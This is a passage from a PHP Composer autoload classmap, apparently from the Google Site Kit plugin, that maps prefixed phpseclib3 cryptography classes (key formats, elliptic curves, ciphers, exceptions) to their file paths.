'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\Common\\Formats\\Keys\\PuTTY' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/Common/Formats/Keys/PuTTY.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\Common\\Formats\\Signature\\Raw' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/Common/Formats/Signature/Raw.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\Common\\PrivateKey' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/Common/PrivateKey.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\Common\\PublicKey' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/Common/PublicKey.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\Common\\StreamCipher' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/Common/StreamCipher.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\Common\\SymmetricKey' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/Common/SymmetricKey.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\Common\\Traits\\Fingerprint' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/Common/Traits/Fingerprint.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\Common\\Traits\\PasswordProtected' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/Common/Traits/PasswordProtected.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\DES' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/DES.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\DH' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/DH.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\DH\\Formats\\Keys\\PKCS1' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/DH/Formats/Keys/PKCS1.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\DH\\Formats\\Keys\\PKCS8' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/DH/Formats/Keys/PKCS8.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\DH\\Parameters' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/DH/Parameters.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\DH\\PrivateKey' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/DH/PrivateKey.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\DH\\PublicKey' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/DH/PublicKey.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\DSA' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/DSA.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\DSA\\Formats\\Keys\\OpenSSH' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/DSA/Formats/Keys/OpenSSH.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\DSA\\Formats\\Keys\\PKCS1' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/DSA/Formats/Keys/PKCS1.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\DSA\\Formats\\Keys\\PKCS8' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/DSA/Formats/Keys/PKCS8.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\DSA\\Formats\\Keys\\PuTTY' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/DSA/Formats/Keys/PuTTY.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\DSA\\Formats\\Keys\\Raw' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/DSA/Formats/Keys/Raw.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\DSA\\Formats\\Keys\\XML' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/DSA/Formats/Keys/XML.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\DSA\\Formats\\Signature\\ASN1' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/DSA/Formats/Signature/ASN1.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\DSA\\Formats\\Signature\\Raw' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/DSA/Formats/Signature/Raw.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\DSA\\Formats\\Signature\\SSH2' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/DSA/Formats/Signature/SSH2.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\DSA\\Parameters' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/DSA/Parameters.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\DSA\\PrivateKey' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/DSA/PrivateKey.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\DSA\\PublicKey' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/DSA/PublicKey.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\BaseCurves\\Base' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/BaseCurves/Base.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\BaseCurves\\Binary' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/BaseCurves/Binary.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\BaseCurves\\KoblitzPrime' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/BaseCurves/KoblitzPrime.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\BaseCurves\\Montgomery' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/BaseCurves/Montgomery.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\BaseCurves\\Prime' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/BaseCurves/Prime.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\BaseCurves\\TwistedEdwards' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/BaseCurves/TwistedEdwards.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\Curve25519' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/Curve25519.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\Curve448' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/Curve448.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\Ed25519' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/Ed25519.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\Ed448' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/Ed448.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\brainpoolP160r1' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/brainpoolP160r1.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\brainpoolP160t1' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/brainpoolP160t1.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\brainpoolP192r1' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/brainpoolP192r1.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\brainpoolP192t1' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/brainpoolP192t1.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\brainpoolP224r1' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/brainpoolP224r1.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\brainpoolP224t1' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/brainpoolP224t1.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\brainpoolP256r1' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/brainpoolP256r1.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\brainpoolP256t1' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/brainpoolP256t1.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\brainpoolP320r1' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/brainpoolP320r1.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\brainpoolP320t1' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/brainpoolP320t1.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\brainpoolP384r1' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/brainpoolP384r1.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\brainpoolP384t1' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/brainpoolP384t1.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\brainpoolP512r1' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/brainpoolP512r1.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\brainpoolP512t1' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/brainpoolP512t1.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\nistb233' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/nistb233.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\nistb409' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/nistb409.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\nistk163' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/nistk163.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\nistk233' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/nistk233.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\nistk283' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/nistk283.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\nistk409' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/nistk409.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\nistp192' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/nistp192.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\nistp224' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/nistp224.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\nistp256' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/nistp256.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\nistp384' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/nistp384.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\nistp521' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/nistp521.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\nistt571' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/nistt571.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\prime192v1' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/prime192v1.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\prime192v2' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/prime192v2.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\prime192v3' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/prime192v3.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\prime239v1' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/prime239v1.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\prime239v2' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/prime239v2.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\prime239v3' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/prime239v3.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\prime256v1' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/prime256v1.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\secp112r1' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/secp112r1.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\secp112r2' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/secp112r2.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\secp128r1' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/secp128r1.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\secp128r2' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/secp128r2.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\secp160k1' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/secp160k1.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\secp160r1' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/secp160r1.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\secp160r2' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/secp160r2.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\secp192k1' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/secp192k1.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\secp192r1' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/secp192r1.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\secp224k1' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/secp224k1.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\secp224r1' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/secp224r1.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\secp256k1' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/secp256k1.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\secp256r1' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/secp256r1.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\secp384r1' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/secp384r1.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\secp521r1' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/secp521r1.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\sect113r1' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/sect113r1.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\sect113r2' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/sect113r2.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\sect131r1' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/sect131r1.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\sect131r2' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/sect131r2.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\sect163k1' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/sect163k1.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\sect163r1' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/sect163r1.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\sect163r2' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/sect163r2.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\sect193r1' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/sect193r1.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\sect193r2' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/sect193r2.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\sect233k1' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/sect233k1.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\sect233r1' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/sect233r1.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\sect239k1' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/sect239k1.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\sect283k1' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/sect283k1.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\sect283r1' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/sect283r1.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\sect409k1' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/sect409k1.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\sect409r1' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/sect409r1.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\sect571k1' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/sect571k1.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\sect571r1' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/sect571r1.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Formats\\Keys\\Common' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Formats/Keys/Common.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Formats\\Keys\\JWK' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Formats/Keys/JWK.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Formats\\Keys\\MontgomeryPrivate' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Formats/Keys/MontgomeryPrivate.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Formats\\Keys\\MontgomeryPublic' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Formats/Keys/MontgomeryPublic.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Formats\\Keys\\OpenSSH' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Formats/Keys/OpenSSH.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Formats\\Keys\\PKCS1' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Formats/Keys/PKCS1.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Formats\\Keys\\PKCS8' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Formats/Keys/PKCS8.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Formats\\Keys\\PuTTY' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Formats/Keys/PuTTY.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Formats\\Keys\\XML' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Formats/Keys/XML.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Formats\\Keys\\libsodium' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Formats/Keys/libsodium.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Formats\\Signature\\ASN1' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Formats/Signature/ASN1.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Formats\\Signature\\IEEE' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Formats/Signature/IEEE.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Formats\\Signature\\Raw' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Formats/Signature/Raw.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Formats\\Signature\\SSH2' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Formats/Signature/SSH2.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Parameters' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/Parameters.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\PrivateKey' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/PrivateKey.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\PublicKey' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/EC/PublicKey.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\Hash' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/Hash.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\PublicKeyLoader' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/PublicKeyLoader.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\RC2' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/RC2.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\RC4' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/RC4.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\RSA' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/RSA.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\RSA\\Formats\\Keys\\JWK' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/RSA/Formats/Keys/JWK.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\RSA\\Formats\\Keys\\MSBLOB' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/RSA/Formats/Keys/MSBLOB.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\RSA\\Formats\\Keys\\OpenSSH' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/RSA/Formats/Keys/OpenSSH.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\RSA\\Formats\\Keys\\PKCS1' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/RSA/Formats/Keys/PKCS1.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\RSA\\Formats\\Keys\\PKCS8' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/RSA/Formats/Keys/PKCS8.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\RSA\\Formats\\Keys\\PSS' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/RSA/Formats/Keys/PSS.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\RSA\\Formats\\Keys\\PuTTY' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/RSA/Formats/Keys/PuTTY.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\RSA\\Formats\\Keys\\Raw' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/RSA/Formats/Keys/Raw.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\RSA\\Formats\\Keys\\XML' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/RSA/Formats/Keys/XML.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\RSA\\PrivateKey' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/RSA/PrivateKey.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\RSA\\PublicKey' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/RSA/PublicKey.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\Random' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/Random.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\Rijndael' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/Rijndael.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\Salsa20' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/Salsa20.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\TripleDES' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/TripleDES.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\Twofish' => $baseDir . '/phpseclib/phpseclib/phpseclib/Crypt/Twofish.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Exception\\BadConfigurationException' => $baseDir . '/phpseclib/phpseclib/phpseclib/Exception/BadConfigurationException.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Exception\\BadDecryptionException' => $baseDir . '/phpseclib/phpseclib/phpseclib/Exception/BadDecryptionException.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Exception\\BadModeException' => $baseDir . '/phpseclib/phpseclib/phpseclib/Exception/BadModeException.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Exception\\ConnectionClosedException' => $baseDir . '/phpseclib/phpseclib/phpseclib/Exception/ConnectionClosedException.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Exception\\FileNotFoundException' => $baseDir . '/phpseclib/phpseclib/phpseclib/Exception/FileNotFoundException.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Exception\\InconsistentSetupException' => $baseDir . '/phpseclib/phpseclib/phpseclib/Exception/InconsistentSetupException.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Exception\\InsufficientSetupException' => $baseDir . '/phpseclib/phpseclib/phpseclib/Exception/InsufficientSetupException.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Exception\\InvalidPacketLengthException' => $baseDir . '/phpseclib/phpseclib/phpseclib/Exception/InvalidPacketLengthException.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Exception\\NoKeyLoadedException' => $baseDir . '/phpseclib/phpseclib/phpseclib/Exception/NoKeyLoadedException.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Exception\\NoSupportedAlgorithmsException' => $baseDir . '/phpseclib/phpseclib/phpseclib/Exception/NoSupportedAlgorithmsException.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Exception\\TimeoutException' => $baseDir . '/phpseclib/phpseclib/phpseclib/Exception/TimeoutException.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Exception\\UnableToConnectException' => $baseDir . '/phpseclib/phpseclib/phpseclib/Exception/UnableToConnectException.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Exception\\UnsupportedAlgorithmException' => $baseDir . '/phpseclib/phpseclib/phpseclib/Exception/UnsupportedAlgorithmException.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Exception\\UnsupportedCurveException' => $baseDir . 